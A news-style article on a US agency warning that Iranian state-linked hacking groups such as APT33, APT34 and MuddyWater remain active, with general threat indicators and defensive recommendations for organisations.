Iranian hackers ‘may still conduct malicious cyber activity,’ US agencies warn

US Agencies Warn Iranian Hackers Could Still Launch Malicious Cyber Operations

In a series of coordinated briefings earlier this month, the United States CISA, the FBI, and the NSA issued a stark reminder that Iranian cyber‑espionage groups remain capable of, and are likely to, conduct malicious activity against American and allied targets. While the agencies highlighted a slowdown in large‑scale ransomware campaigns linked to Tehran, they emphasized that the underlying threat landscape has not fundamentally changed.

According to the joint statement, Iran’s “Cyber‑Evil” units—most notably APT33, APT34, and the “MuddyWater” group—continue to refine their tactics, techniques, and procedures (ATT&CK) to evade detection. The agencies warned that these actors are still pursuing a range of objectives, from intelligence‑gathering and supply‑chain sabotage to the deployment of destructive malware that can disrupt critical infrastructure.

Key Indicators of Ongoing Iranian Threat Activity

• Increased use of “living‑off‑the‑land” tools: Malware developers are leveraging legitimate system utilities (e.g., PowerShell, Windows Management Instrumentation) to mask malicious code.
• Targeted phishing and credential‑stuffing campaigns: Recent reports show Iran‑backed actors focusing on high‑value sectors such as energy, aerospace, and healthcare.
• Supply‑chain infiltration: Threat actors are still attempting to compromise software update mechanisms and third‑party service providers to gain persistent footholds.
• Emergence of “dual‑use” capabilities: Some groups are blending espionage tools with destructive payloads, blurring the line between data theft and sabotage.

Officials from the ODNI underscored that the “strategic patience” observed in recent Iranian operations does not equate to a reduction in risk. Instead, Tehran appears to be recalibrating its approach, focusing on long‑term intelligence collection while reserving destructive capabilities for moments of heightened geopolitical tension.

Recommendations for Organizations and Individuals

To mitigate the evolving Iranian threat, the agencies outlined a set of best‑practice measures:

1. Adopt a zero‑trust architecture: Verify every user, device, and application before granting access to sensitive resources.
2. Implement continuous monitoring: Deploy endpoint detection and response (EDR) solutions that can detect anomalous behavior in real time.
3. Conduct regular threat‑intel briefings: Stay informed about Iran‑linked indicators of compromise (IOCs) through trusted information‑sharing platforms.
4. Patch and harden critical systems: Prioritize timely updates for operating systems, firmware, and third‑party applications.
5. Exercise incident‑response drills: Simulate scenarios involving Iranian tactics to test and refine response capabilities.

While the United States continues to bolster its defensive posture, the warning from CISA, the FBI, and the NSA serves as a clear signal: Iranian hackers have not retreated, and their capacity for sophisticated, malicious cyber activity remains intact. Vigilance, collaboration, and proactive security hygiene are essential to countering a threat that, despite recent fluctuations, persists at the strategic core of Iran’s cyber‑operations.